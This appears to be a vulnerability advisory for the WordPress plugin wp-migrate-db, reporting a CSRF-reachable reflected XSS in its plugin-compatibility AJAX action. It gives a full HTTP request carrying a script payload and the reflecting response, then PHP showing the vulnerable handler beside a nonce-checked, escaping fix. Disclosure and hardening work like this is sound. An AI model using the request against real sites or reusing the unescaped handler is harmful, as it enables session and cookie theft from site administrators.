wp-migrate-db
XSS at _sanitize_data()
A logged-in user can be tricked into visiting a site that issues a POST request like this (possible because the handler performs no nonce check):
POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140903 Firefox/24.0 Iceweasel/24.8.0
Accept: text/plain, */*; q=0.01
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wp/wp-admin/tools.php?page=wp-migrate-db
Content-Length: 67
Cookie: wordpress_732bf205f063fd120b84d8a0d44e2d5d=admin%7C1435910214%7C4c8949db20de2daae58491adc261c687; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1435738697; wordpress_logged_in_732bf205f063fd120b84d8a0d44e2d5d=admin%7C1435910214%7C8bdff8e1ff8f31caa902bc905439eb03
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=wpmdb_plugin_compatibility&install=<script>alert(1)</script>
The response received in return:
HTTP/1.1 200 OK
Date: Wed, 01 Jul 2015 08:29:14 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.41-0+deb7u1
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 107
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
ajax_plugin_compatibility was expecting a valid numeric but got something else: "<script>alert(1)</script>"
This results in execution of the script in the vulnerable domain's context, enabling the attacker to steal user data (e.g. cookies).
I believe responses from _sanitize_data() should themselves be sanitized.
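As an added illustration (not the plugin's own source), the pattern the advisory describes, a numeric check that reflects the raw input in its error message, shown beside a hardened form. The function names prefixed wpmdb_compat_ and the nonce action string are assumptions; check_ajax_referer(), current_user_can(), esc_html(), wp_unslash() and wp_send_json_error() are standard WordPress APIs.

```php
<?php
// Vulnerable pattern (hypothetical reconstruction): no nonce check, and the
// raw request value is reflected straight into an HTML response.
function wpmdb_compat_vulnerable() {
    $install = isset( $_POST['install'] ) ? $_POST['install'] : '';
    if ( ! is_numeric( $install ) ) {
        // Attacker-controlled markup lands in the page unescaped.
        echo 'ajax_plugin_compatibility was expecting a valid numeric but got something else: "' . $install . '"';
        wp_die();
    }
    // ... proceed with the numeric value ...
}

// Hardened pattern: verify the nonce (defeats the cross-site POST), check
// capability, and escape any reflected value before it is output.
function wpmdb_compat_hardened() {
    // check_ajax_referer() terminates the request when the 'nonce' field is
    // missing or invalid, so a forged request from another site never reaches
    // the code below. The action string is an assumed name; the admin page's
    // JavaScript must send a nonce created with wp_create_nonce() for it.
    check_ajax_referer( 'wpmdb-plugin-compatibility', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges' ); // exits
    }

    $install = isset( $_POST['install'] ) ? wp_unslash( $_POST['install'] ) : '';
    if ( ! is_numeric( $install ) ) {
        // esc_html() turns <script> into &lt;script&gt;, so the browser renders
        // the offending value as text rather than executing it.
        wp_send_json_error( 'expected a numeric value, got: ' . esc_html( $install ) ); // exits
    }

    $install = (int) $install;
    // ... proceed with the numeric value ...
    wp_send_json_success( array( 'install' => $install ) );
}
```

The nonce check addresses the missing CSRF protection the advisory points out, while the escaping addresses the reflection itself; both are needed, since a nonce alone does nothing once an attacker can obtain one.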